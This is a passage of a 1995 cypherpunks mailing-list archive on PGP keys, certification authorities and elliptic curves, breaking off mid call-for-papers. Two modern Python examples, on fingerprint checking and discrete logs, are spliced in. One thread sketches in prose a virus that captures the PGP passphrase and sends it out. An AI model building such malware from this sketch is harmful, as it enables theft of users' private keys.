Content-Type: text/plain


On Sat, 25 Nov 1995, Adam Shostack wrote:

> 	Does X.509 version 3 fix the problem that Ross Anderson points
> out in his 'Robustness Principles' paper? (Crypto '95 proceedings, or
> ftp.cl.cam.ac.uk/users/rja14/robustness.ps.Z)
> 
> 	It's an excellent paper, well worth reading, but the basic
> problem is that X.509 encrypts before signing.

You'd rather sign before encryption??

Doesn't that give you "known plain-text" to attack?  i.e. the signature.

I'm not sure whether it would or wouldn't, but I'm sure some
cryptographers here might clear that up mighty quick -- before any more
harm is allowed, I mean. 

> Adam
> 
> -- 
> "It is seldom that liberty of any kind is lost all at once."
> 					               -Hume


Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jpb@miamisci.org (Joe Block)
Date: Sun, 26 Nov 1995 15:21:39 +0800
To: cypherpunks@toad.com
Subject: Re: So. FL Cypherpunks Keysigning/Party
Message-ID: <v01520c09acddba0b349f@[199.227.2.170]>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jim Ray (liberty@gate.net) announced a South Florida Cypherpunks meeting
for the night of Wednesday, November 29th at the Abbey Brewing Company on
South beach.

>Location:
>The Abbey Brewing Company  (305) 538-8110
>1115 16th Street, Miami Beach
>
>Directions:
>[From North: Take I-95 South to 195 exit, over to the beach, and go South
>on Alton Road. Look for a green sign that says "BAR" atop the building.]
>[From South: Take I-95 North to 395 exit, over to the beach, and go North
>on Alton Road. Look for a green sign that says "BAR" atop the building.]

I am proposing that all cypherpunks planning on attending the meeting email
me their PGP key fingerprint between now and noon on the 29th.  I'll
collate them and print enough copies of the fingerprint checklist for all
who've announced that they're planning to attend.  At the meeting, you can
verify (or not, not my business, really) the fingerprints with the other
attendees.  Afterwards, we'll exchange keys via email and sign them at home
and mail them back to their owners.  I'll set up an email list so that each
person can email out their key once they've merged all the signatures.

Suggestions as to how to streamline this process are welcome.

For more information on the meeting, contact Jim at liberty@gate.net

Joe Block <jpb@miamisci.org>

"We can't be so fixated on our desire
 to preserve the rights of ordinary Americans ..."
 -- Bill Clinton  (USA TODAY, 11 March 1993, page 2A)
-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMLgL5WGnwFiC3O2NAQHxwAgAu6kSVBfEwBYGwNaYbw5OOjNxP6j49T5F
h2z7WIKhehq94yiT+WhyijMscCqlGUTsBp3aDVFYY9n2/ONXr+MyGIMoTst0dvsv
dXhuguIcBTuvImTddGA4MNZG7eUibO/r98BPJlF9iRfHTwpCOXOsNJGit+ONSB++
Cy8xgAFUiAUaOvNbi63pTnELoyCmBvFqhROqspeUmRGYYHZj4w3DF3nEH+XED31K
vVx7FFpejIeBBfhk72T7vL0L+cu17R4uIhOgmqUmHIw7k7rmLxf+z7f7fNAwQpPi
yjEsyXPtKwENXV2kRSc12O8XjwNoKiQBfuGBDpSfqbev4fkwoMuoyA==
=z9sP
-----END PGP SIGNATURE-----

signoff
2048bit-Fingerprint: 74 64 C7 6F 51 72 36 3D 87 75 F9 F5 2A F6 8F 74
------------------------------------------------------------------------
Help Phil! email zldf@clark.net or see http://www.netresponse.com/zldf






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 26 Nov 1995 23:19:21 +0800
To: cypherpunks@toad.com
Subject: BOS_nya
Message-ID: <199511261508.KAA17650@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   11-26-95. Washrag:

   "Seeking the Government That Governs Best." Book review.

      What Comes Next:
      The End of Big Government And the New Paradigm Ahead
      By James P. Pinkerton
      Hyperion. 404 pp. $24.95

      In Pinkerton's account, bureaucracy survives today only
      because no one has yet developed a coherent replacement
      model." Instead we have deluded ourselves into thinking
      that periodic upgrading of what Pinkerton calls the
      "Bureaucratic Operating System" (BOS) -- in the same way
      that computer software is upgraded -- will enable us to
      avoid the gloomy prospect of life in the "Cyber Future,"
      his term for the horrific predicament of extreme
      inequality and hypercrime to which we are headed.

      At one point Pinkerton suggests that a parallel for Bill
      Clinton may be found in Mikhail Gorbachev. Both leaders
      "shrank from genuine perestroika" after their peoples
      had come to the realization that the system itself was
      the problem.

      Displaying a sure grasp of popular culture, technology
      and political history, Pinkerton writes engagingly and
      insightfully about the defects and malfunctionings of
      the American bureaucratic state. His refreshing analyses
      of the flaws in bureaucratic thinking are among the best
      that we have on the subject and, surely, the wittiest.

   BOS_nya  (7 kb)












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jeff Hupp" <jhupp@novellnet.gensys.com>
Date: Mon, 27 Nov 1995 00:54:14 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <20439E87AE1@Novellnet.Gensys.com>
MIME-Version: 1.0
Content-Type: text/plain


On 25 Nov 95 at 15:35, Alex Strasheim wrote:

: > Basically when the browser finds a new CA that it does know about it prompts
: > the user and through a series of dialog boxes the user chooses to trust it
: > or not. 
: 
: Is anyone running an ssl web server that would let us see how this works?
: 
: 
	A 'how to' on rolling your own can be found at:
		http://fiasco.snre.umich.edu/~altitude/ssl/ssl.saga.html

	While that one is using a certificate from VeriSign, as mentioned 
earlier you can create your own authority and certificate with tools you find at:
		http://bond.edu.au/External/Misc/Crypto/

-- 
JHupp@gensys.com           |For PGP Public Key:
http://gensys.com          |finger jhupp@gensys.com
The difference between science and the fuzzy subjects is that science
requires reasoning, while those other subjects merely require scholarship





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas E Zerucha <zerucha@shell.portal.com>
Date: Mon, 27 Nov 1995 03:54:03 +0800
To: Norman Hardy <norm@netcom.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <acdc55c10202100472f8@DialupEudora>
Message-ID: <Pine.SUN.3.90.951126111730.22642A-100000@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Norman Hardy wrote:

> At 2:46 PM 11/24/95, Thomas E Zerucha wrote:
> ....
> 
> >It takes quite an effort to create a complex virus to do this.  It
> >reminds me of the Glomar Challenger that was used to recover the remains
> >of a Russian sub (my memory is somewhat faulty).  Such a virus would
> >require a great investment in time and money.  What target would be worth it?
> >Many otherwise feasible things aren't economically practical.
> 
> Yes, but if your particular habits became widespread, an intelligence
> agency could amortize the virus effort across many victims.
> 
> Here is just one such complicated virus:
> Sit in the OS watching for PGP to be launched. Patch PGP on the way in. The
> patch writes to disk the location and password for the secure key ring.
> Concurrently the virus watches for there to be IP service and sends the
> disk information as a UDP.

The virus is starting to get large and noticeable.  First, I alternate 
between a.out and ELF (and DOS .EXE). It doesn't have to patch pgp, just 
look for it to be loaded and the secring file accessed.  Then record 
keystrokes.  This would also work with a hardware implementation if the 
secring passphrase is external (as opposed to an external keypad).

This is what can be done when PGP is used for communication.  For other 
info, I can isolate a computer (no modem, unroutable IP addresses, etc).

Of course our firewall is a socks server and doesn't forward UDP.  Maybe 
a socksified, SSL virus?  My computer is attached that way far more than 
via modem.  And maybe I should just nuke (or modularize) UDP?  You can do 
interesting things with kernel source.

> Alternatively the virus waits for idle time, (screen saver time) and dials
> an 800 number having turned off the modem speaker. But don't send the same
> data twice!

That would be interesting - even with the speaker "off" the power surge 
causes clicking and other signs.  Not to mention that the interrupt count 
would start moving (of course the virus could replace the entire OS and 
would only have to find 300K chunks to hide in).

Were they that interested, they could place a surveillance device over my 
desk (I don't know if they can pick up the scan on LCDs like they can on 
monitors - I am surprised they didn't put the kybosh to the FCC emission 
rules).  Maybe I can move my desk, or my pgp station inside our EMI 
testing faraday cage :).

zerucha@shell.portal.com -or- 2015509 on MCI Mail
  finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <khijol!erc@uunet.uu.net>
Date: Mon, 27 Nov 1995 02:09:00 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: Cypherpunk Certification Authority
In-Reply-To: <199511260942.BAA09733@jobe.shell.portal.com>
Message-ID: <199511261854.MAA08675@khijol>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

> > (Well that is theory, and what netscape release notes say, since
> > I don't have access to an SSL server right now, and would need to figure
> > out how to make my own certificate, I haven't tried it).
> 
> Bingo.  *theory* ... right ... I mean what would be the point??
> 
> Installing Netscape degrades your inherent system security.  No ifs, 
> ands, or buts.
> 
> Netscape Navigator basically destroys whatever sense of privacy or
> security, any person ever had the illusion of having.  And that pretty 
> well rules out CA.
> 
> Alice de 'nonymous ...
> 
>                                   ...just another one of those...
>                                                    ...hunters...
> 
> P.S.  This post is in the public domain.
>                   C.  S.  U.  M.  O.  C.  L.  U.  N.  E.

Is this another one of those LD tentacles? ;)
- --
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
					214/993-3935	voicemail/pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMLi30yS9AwzY9LDxAQFZTwP/fyisNS+8UlleOpy4+mo8lxD6i7bq3sdP
I80XfihTenRayNPj+eVHBfciSrfSXWbSaScGi5MVUILfShDd71E0mxCimvfXpey6
hHQc2gyMCAuHN5ZswXBKrOry23dzIgNrwfLlnbMoGoUQro2Z/Cg/b9YOy4qaGMer
Gido6n71Npc=
=MN40
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 05:17:52 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk Certification Authority
Message-ID: <199511262109.NAA29631@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 Nov 1995, Robert Hettinga wrote:

> >Is this another one of those LD tentacles? ;)
> 
> Must be that or a spoof of some kind... "She" didn't sign it, and "she" claims
> to have issued a signature...

I have never signed any of my posts to this mailing list and frankly have
no intention of beginning at this point.  No matter what some spoofer
posts, as my "key".  Whoever the dolt was who posted the "pgp key"
hopefully will begin to use it and produce something worthy of their
"signing". 

I always thought that my words spoke for themselves.

I really don't have the inclination to travel to a secured facility and 
to use a secured machine in order to reply to a message on this list, and 
I truly am not interested in issuing a new key on a daily basis.

That is reserved for something of some importance.

Frankly, this is really not worth it.  As some people might have noticed, 
I've simply closed off this communications channel.  There really is 
nothing left to say at this point.  

Or as some people might learn, "Lilies that fester, smell far worse than
weeds."  I think that was a line from a sonnet or something ... not that 
it would refer to anything in particular, or anything. <g>

> Cheers,
> Bob Hettinga


Alice de 'nonymous ...

                                  ...just another one of those...
                                                   ...hunters...

P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Albert Nanomius <nanomius@netcom.com>
Date: Mon, 27 Nov 1995 05:43:44 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199511262132.NAA05593@netcom6.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



------- Forwarded Message

From: "LadyNada" <ladynada@ix.netcom.com>
To: snet-l@world.std.com
Date: Sun, 26 Nov 1995 13:26:39 +0000
Subject: Post Office to approve some internet email


- -- Area : AEN NEWS -----------------------------------------( M-BOARD.SU1 )----
  Msg#  22280                                       Date: 11-18-95  19:01      
  From: jared@alaska.net                            Read: No     Replied: No   
    To: All                                         Mark:                      
  Subj: Oh, great.  The Post Office is going to certify Internet mail.         
- -------------------------------------------------------------------------------
From: "Jared Armstrong" <jared@alaska.net>
Originally to: news@aen.org
Original Date: Sat, 18 Nov 95 18:47 EST

http://techweb.cmp.com/techweb/ia/18issue/18post.html

 > Post Office offers Internet digital ID

 > Certification authority a key enabler of electronic commerce

 > By Gail Bronson

 > WASHINGTON - Come next summer, the U.S. Postal Service
 > expects to be up and running with a service that will identify
 > senders and receivers of Internet messages, a critical enabler of
 > electronic commerce.

 > Specifically, the Postal Service will operate a certification
 > authority for public-key certificates used to digitally sign
 > messages transmitted over the Internet.

 > The Postal Service expects the service to be of particular interest
 > to anyone involved in electronic commerce or electronic data
 > interchange, in which the ability to assure the identity of both
 > the sender and receiver of information can be crucial.

 > "Right now there is no way to figure out if messages on the
 > Internet have been tampered with nor is there any way to
 > authenticate the genuine identity of a sender," said Paul Raines,
 > program manager for electronic commerce at the Postal Service. "It
 > could be a dog on the other end of the Internet now for all you
 > know."

 > Limited beta tests of the Postal Service's system already are under
 > way within the federal government, at the Federal Aviation
 > Administration, Social Security and the Internal Revenue Service.

 > "We're eager to work with VeriSign [RSA Data Security Inc.
 > spin-off] and any other certification authorities to come up with
 > ways to help with cross certification," Raines said. "We're not in
 > this to compete with private companies, rather, we're trying to
 > enable [the electronic commerce] industry."

 > Some users may find the Postal Service certification authority
 > service more appealing than private alternatives because its
 > service will carry the weight of law - tampering with Internet
 > messages would be as much a crime as tampering with regular U.S.
 > mail. On the other hand, there is always the lingering concern of
 > having to deal with a federal bureaucracy.

 > The Postal Service intends to play two roles in the certification
 > business.

 > First, as a certifying service the federal agency will provide the
 > code, or public-key certificate, necessary for recipients of
 > digitally signed messages to identify the sender. This service will
 > be necessary to decrypt mail unless the two correspondents
 > previously exchanged their keys privately. Second, the Postal
 > Service will maintain a server to manage a public register of
 > public-key certificates accessible off the Internet, Raines said.

 > The Postal Service will conduct market studies to gauge demand
 > before deciding how much individuals must pay to obtain someone
 > else's public key certificate. In addition, the Postal Service will
 > sell for less than a dollar an electronic date-time stamp to prove
 > the existence of a message in a particular point in time.

 > "We're taking the same attributes of hard copy that make them
 > legally binding and transferring them to electronic
 > correspondence," Raines said.

 > The Postal Service is working with several companies, including
 > Premenos Corp., to develop the necessary software, Raines said. The
 > user agent and interface specifications for designing software to
 > interface with the Postal Service's server, however, are available
 > free to any one willing to sign a licensing agreement, Raines said.

 > Regardless of how such arrangements work themselves out, the Postal
 > Service intends to operate this business on a nonprofit,
 > self-supported basis. "We don't intend to have first-class mail
 > supporting Internet mail," Raines said.

______________________________________________________
                 Jared Armstrong
              Anchorage, Alaska, USA
             Last Free Place On Earth

  jared@alaska.net    http://www.alaska.net/~jared
 For PGP  Key, Send E-Mail With Subject:Get PGP Key
______________________________________________________
                  PGP Key ID E2B22AD1
                    PGP Fingerprint
  38 C7 58 C0 C3 10 E0 9D 51 B2 F4 FA 76 04 47 87
______________________________________________________
______________________________________________________




- --- Reply to: news@aen.org
 * Origin: AEN NEWS Internet Gateway (1:231/110.1)


------- End of Forwarded Message





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 05:43:14 +0800
To: cypherpunks@toad.com
Subject: Re: Junk E-Mail - Part 4
Message-ID: <199511262133.NAA01459@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 23 Nov 1995, James M. Cobb wrote:

>    BRUSSELS/LONDON - SELLING - A ban on telephone "cold 
>    calling" throughout the European Union was on Tuesday 
>    approved by Euro-MPs, to the consternation of direct mar- 
>    keting and distance selling organisations.  In a move de- 
>    signed to spare people from what MEPs consider to be ir- 
>    ritating telephone calls, a key parliamentary committee 
>    voted to make prior consent from consumers obligatory 
>    before a seller can approach them by telephone. 
>  
>    The proposed ban also applies to communications by e- 
>    mail, raising fears among publishing organisations that 
>    the development of the information society in Europe could 
>    be damaged. 

I think that there are significantly different standards and expectations 
outside the borders of the United States, than inside.  Can you imagine 
the unmitigated "gall" of Euro-MPs in protecting the public rather than 
caving in to direct marketing special interest groups??

Goodness ... how archaic.

The next thing those Europeans are going to do is something really strange
and un-American, like having television commercials broadcast in between
TV programs -- broadcast only after a show is over.  Finished.

Those Europeans just might not allow commercials to be woven in between 
scenes of a 20-minute sitcom.  They might say, before and after ... and
that's it.

I mean this idea that advertising is "pollution" might start to catch on 
in certain European quarters.

> Ban fear, for we have nothing to fear but fear itself. 

Heavens, no.  Then again, I'm waiting for the day that the NY Times 
allows advertising on its op-ed page.

Or for that matter the Washington Post in its online edition.




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 27 Nov 1995 05:59:00 +0800
To: cypherpunks@toad.com
Subject: Re: key for Alice as promised (not)
Message-ID: <199511262145.NAA02219@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 22 Nov 1995 anonymous-remailer@shell.portal.com wrote:

> > As an incentive for Alice to generate herself a PGP key, I hereby
> > place Alice on notice that if she doesn't sign her next post, and
> > provide a PGP key, I will create one for her, and steal all the
> > positive (?) reputation that she has developed so far.

Positive reputation??  Me??  Uhhm, thanks, I guess.

> > You have 24 hours Alice, otherwise a key gets posted to here, and to
> > the keyservers with your nym on it.
> 
> Well 24 hours have passed, and Alice remains unrepentant:

Can you imagine??  I'm simply not willing to fool myself into thinking 
that I have security by posting a key and using PGP.

I think that's irresponsible.

Unless, I have a secure machine dedicated to PGP *which I don't* I don't 
fool myself into thinking that I have any security, at all.

> On Tue, 21 Nov 1995, the old Alice de 'nonymous wrote:
> 
> > Alice here ...
> > 
> > No, *I* am the real Alice, and I refuse to use PGP signing.

Yep ... that's right.

> So here we go Alice's key:
> 
> Type bits/keyID    Date       User ID
> pub  1024/23292ED1 1995/11/22 Alice de 'nonymous <cypherpunks@toad.com>
>           Key fingerprint =  CA 76 81 41 54 CE E7 D6  62 EE 6D 65 EE FB A3 55

Gee, it might even help if you got the address right.  Since when is the 
list address, my address??

cypherpunks@toad.com??




Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.
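
What the key listing quoted in the message above does and does not bind, as an added Python example that is not part of any post in this thread. In a PGP 2.x (version 3) key the fingerprint is MD5 over the modulus and exponent and the short key ID is the low 32 bits of the modulus, so the User ID is free text outside both; the two sample keys are constructed from well-known primes, and all function and class names are hypothetical.

```python
import hashlib
import hmac
import re
from dataclasses import dataclass

# Key listing exactly as quoted in the message above.
PAGE_LISTING = """\
Type bits/keyID    Date       User ID
pub  1024/23292ED1 1995/11/22 Alice de 'nonymous <cypherpunks@toad.com>
          Key fingerprint =  CA 76 81 41 54 CE E7 D6  62 EE 6D 65 EE FB A3 55
"""

PUB_RE = re.compile(r"^pub\s+(\d+)/([0-9A-F]{8})\s+(\d{4}/\d\d/\d\d)\s+(.+)$", re.M)
FPR_RE = re.compile(r"Key fingerprint\s*=\s*((?:[0-9A-Fa-f]{2}\s*){16})")


@dataclass(frozen=True)
class V3PublicKey:
    user_id: str  # free text typed by whoever generated the key
    n: int        # RSA public modulus
    e: int        # RSA public exponent


def normalise(fp: str) -> str:
    """Strip spacing so fingerprints compare regardless of layout."""
    return "".join(fp.split()).upper()


def parse_listing(text: str) -> dict:
    """Pull the fields out of a PGP 2.x style key listing."""
    pub, fpr = PUB_RE.search(text), FPR_RE.search(text)
    if not pub or not fpr:
        raise ValueError("not a PGP 2.x key listing")
    return {"bits": int(pub.group(1)), "key_id": pub.group(2),
            "date": pub.group(3), "user_id": pub.group(4).strip(),
            "fingerprint": normalise(fpr.group(1))}


def mpi_body(x: int) -> bytes:
    """Big-endian value of an MPI without its two-octet bit-length prefix."""
    return x.to_bytes((x.bit_length() + 7) // 8, "big")


def fingerprint_hex(key: V3PublicKey) -> str:
    """V3 fingerprint: MD5 over the MPI bodies of n, then e (see RFC 4880)."""
    return hashlib.md5(mpi_body(key.n) + mpi_body(key.e)).hexdigest().upper()


def short_key_id(key: V3PublicKey) -> str:
    """Eight-hex-digit key ID as listed by PGP 2.x: low 32 bits of n."""
    return f"{key.n & 0xFFFFFFFF:08X}"


def format_pgp(fp_hex: str) -> str:
    """Print a fingerprint the way the listing does: 8 pairs, gap, 8 pairs."""
    pairs = [fp_hex[i:i + 2] for i in range(0, 32, 2)]
    return " ".join(pairs[:8]) + "  " + " ".join(pairs[8:])


def fingerprint_matches(key: V3PublicKey, trusted_fp: str) -> bool:
    """Accept a key only if it hashes to a fingerprint obtained out of band."""
    return hmac.compare_digest(fingerprint_hex(key), normalise(trusted_fp))


# Two constructed keys carrying the same name. Toy moduli, not secure keys.
SAME_NAME = "Alice de 'nonymous <cypherpunks@toad.com>"
KEY_A = V3PublicKey(SAME_NAME, (2**255 - 19) * (2**130 - 5), 17)
KEY_B = V3PublicKey(SAME_NAME, (2**127 - 1) * (2**448 - 2**224 - 1), 17)


def audit(keys, trusted_fp):
    """For each candidate key: (key ID, printed fingerprint, accepted?)."""
    return [(short_key_id(k), format_pgp(fingerprint_hex(k)),
             fingerprint_matches(k, trusted_fp)) for k in keys]


if __name__ == "__main__":
    print(parse_listing(PAGE_LISTING))
    # Pretend KEY_A's fingerprint was the one confirmed over a trusted channel.
    trusted = format_pgp(fingerprint_hex(KEY_A))
    for row in audit([KEY_A, KEY_B], trusted):
        print(row)
```

Both constructed keys list the same name, but only the one whose key material hashes to the trusted fingerprint is accepted.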








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <doug@Eng.Auburn.EDU>
Date: Mon, 27 Nov 1995 04:26:59 +0800
To: "Mark M." <markm@omni.voicenet.com>
Subject: Re: Virus attacks on PGP
In-Reply-To: <Pine.LNX.3.91.951124222957.107A-100000@localhost>
Message-ID: <Pine.SUN.3.91.951126141155.15854B-100000@nexus.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 24 Nov 1995, Mark M. wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> On Fri, 24 Nov 1995, Moroni wrote:
> 
> > 
> >     Where can one get PGP burnt into cdrom? Or the equipment to do it
> >              Thanks in advance
> >                  moroni
> > 
> > 
> > 
> 
> I remember seeing in a computer catalog a device that can burn data into a
> cdrom and it even supplies blank cd's.  Unfortunately, I cannot remember
> the name of the catalog.  It might have been _Tiger Software_ or some
> similar catalog.  I do know that the technology is available.
> 
> 
There was a recent review in network computing of about 60 or so
different CDROM recording devices. The cheapest one was about $500 from
Liberty. The most expensive was I think the one from Kodak, for about $20k.
The capabilities of each are different. Some include buffering, some don't.
However, the pre-mastering software used to make file systems on a CDROM
(HSFS, UFS, DOS, ISO-???? (forget that four digit number)) is sold separately,
but generally not too expensive. There are also single and multi-session
CD 'burners'. The single session means you have to do the entire disk in
one session, and generally if you mess up, you need a new disk. The multi-
session devices let you start a session, and pick it up with more information
at a later time.

Most of them are designed for multi-media or audio recording, but you can
generally get pre-mastering software that will work with something like
CD-XA.. etc..
 Check your software for compatibility before purchasing the hardware.

____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		Pro is to Con as progress is to congress





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: norm@netcom.com (Norman Hardy)
Date: Mon, 27 Nov 1995 07:24:46 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: Elliptic curves, current status?
Message-ID: <acde968205021004b44c@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


At 12:07 PM 11/25/95, James A. Donald wrote:

....
>Can someone tell me the true story?

Not with any assurance. I don't trust my own knowledge yet.
I think that the opinion is that the discrete log problem is harder
with elliptic curves than for prime modulus arithmetic for numbers
of a given size. That is why you can use fewer bits.
The inner loop in some elliptic curve systems is not multiply-add
(as is the case with number fields)
but other operations that are as efficient with gates but less
efficient with normal machine instructions.

There are probably an order of magnitude more people that
have studied and published about the problems of breaking
prime modulus crypto than elliptic curves. Perhaps progress
will be faster should elliptic curves be studied by more people.
There are a lot of tricks to speed up discrete logs for prime
modulus schemes that don't seem to work for elliptic curves.

There are many parameters to an elliptic curve crypto system.
I haven't seen any taxonomy of which kinds are good and which
have been shown to be weak. In contrast there seems to be a
consensus about how to pick primes for RSA or Diffie-Hellman.

I am certainly no expert. Perhaps this will prompt comments
from someone who can point to real information.
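
The comparison in the message above, made concrete at toy scale as an added Python example (not code from the post). It runs the same generic discrete-log search, baby-step giant-step, in a prime-modulus group and on an elliptic curve: the generic search costs about the square root of the group order in either group, while the faster index-calculus methods known for prime moduli, which are not implemented here, have no known counterpart on general curves. The parameters (p = 10007, curve y^2 = x^3 + x + 1, bases 5 and (0, 1)) and all names are constructed for illustration.

```python
from math import isqrt


class ModP:
    """Multiplicative group of integers modulo a prime p."""

    def __init__(self, p):
        self.p, self.identity = p, 1

    def op(self, a, b):
        return a * b % self.p  # the inner loop is one modular multiplication


class Curve:
    """Points on y^2 = x^3 + a*x + b over F_p; None is the point at infinity."""

    def __init__(self, p, a, b):
        if (4 * a**3 + 27 * b**2) % p == 0:
            raise ValueError("singular curve")
        self.p, self.a, self.b, self.identity = p, a, b, None

    def contains(self, pt):
        if pt is None:
            return True
        x, y = pt
        return (y * y - (x**3 + self.a * x + self.b)) % self.p == 0

    def op(self, P, Q):
        # The inner loop is a field inversion plus several multiplications.
        if P is None:
            return Q
        if Q is None:
            return P
        (x1, y1), (x2, y2), p = P, Q, self.p
        if x1 == x2 and (y1 + y2) % p == 0:
            return None  # P + (-P)
        if P == Q:
            lam = (3 * x1 * x1 + self.a) * pow(2 * y1 % p, -1, p) % p
        else:
            lam = (y2 - y1) * pow((x2 - x1) % p, -1, p) % p
        x3 = (lam * lam - x1 - x2) % p
        return (x3, (lam * (x1 - x3) - y1) % p)


def power(group, g, k):
    """g combined with itself k times (square-and-multiply / double-and-add)."""
    result, base = group.identity, g
    while k:
        if k & 1:
            result = group.op(result, base)
        base = group.op(base, base)
        k >>= 1
    return result


def element_order(group, g):
    """Order of g by brute force; only feasible at toy sizes."""
    n, acc = 1, g
    while acc != group.identity:
        acc, n = group.op(acc, g), n + 1
    return n


def bsgs(group, g, h, order):
    """Generic discrete log. Returns (k, ops) with power(group, g, k) == h."""
    m = isqrt(order - 1) + 1  # ceil(sqrt(order))
    table, acc, ops = {}, group.identity, 0
    for j in range(m):  # baby steps: store g^j
        table.setdefault(acc, j)
        acc, ops = group.op(acc, g), ops + 1
    step = power(group, g, order - m)  # g^(-m), since g^order is the identity
    gamma = h
    for i in range(m):  # giant steps: h * g^(-i*m)
        if gamma in table:
            return (i * m + table[gamma]) % order, ops
        gamma, ops = group.op(gamma, step), ops + 1
    return None, ops


def compare(secret=1234):
    """Run the same search in both groups and report order and cost."""
    groups = {"mod p": (ModP(10007), 5), "curve": (Curve(10007, 1, 1), (0, 1))}
    results = {}
    for name, (group, g) in groups.items():
        order = element_order(group, g)
        h = power(group, g, secret)
        k, ops = bsgs(group, g, h, order)
        results[name] = {"order": order, "recovered": k, "ops": ops,
                         "ok": k is not None and power(group, g, k) == h}
    return results


if __name__ == "__main__":
    for name, row in compare().items():
        print(name, row)
```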






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Zerucha <root@deimos.toad.com>
Date: Mon, 27 Nov 1995 04:30:59 +0800
To: cypherpunks@toad.com
Subject: Re: Cyberpunk handbook
In-Reply-To: <199511210436.UAA26114@jobe.shell.portal.com>
Message-ID: <Pine.LNX.3.91.951126151636.218C-100000@deimos>
MIME-Version: 1.0
Content-Type: text/plain


The worst part of the book was the cover.  I didn't think I was a 
cyberpunk until I could check off 8 out of 10 items (I don't have a pager 
or fake security ID, but I do have a carbide scribe and library with 
similar books in similar stacks:).  To say nothing about fashion.  I am 
no longer in denial ;).

zerucha@shell.portal.com -or- 2015509 on MCI Mail
finger zerucha@jobe.portal.com for PGP key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:44:34 +0800
To: cypherpunks@toad.com
Subject: Re: BOS_nya
Message-ID: <v02120d01acde7b8ed2d5@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>      What Comes Next:
>      The End of Big Government And the New Paradigm Ahead
>      By James P. Pinkerton
>      Hyperion. 404 pp. $24.95

I read a review of this book in the Standard <ducking rotten tomatoes>
within the last week or so.

If you think *I'm* hyperjargonate, you should see how this guy does it.
Hear tell he practically invents his own language...

May be worth a read if the local library has it, though.

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 27 Nov 1995 04:47:10 +0800
To: cypherpunks@toad.com
Subject: Electronic Commerce CFP for Special Issue in _The Information Society_
Message-ID: <v02120d03acde7d0d2caa@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

<many snipped mail headers later...>

Dear Colleague:

You may be interested in submitting a manuscript for review for the
following special issue on Electronic Commerce.

Rolf Wigand

* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *

                        CALL FOR PAPERS

          For a Special Issue on 'Electronic Commerce'

       The Information Society (An International Journal)
       --------------------------------------------------

_The Information Society (TIS)_ journal is inviting authors to submit
papers for review on the topic of 'Electronic Commerce' for a special
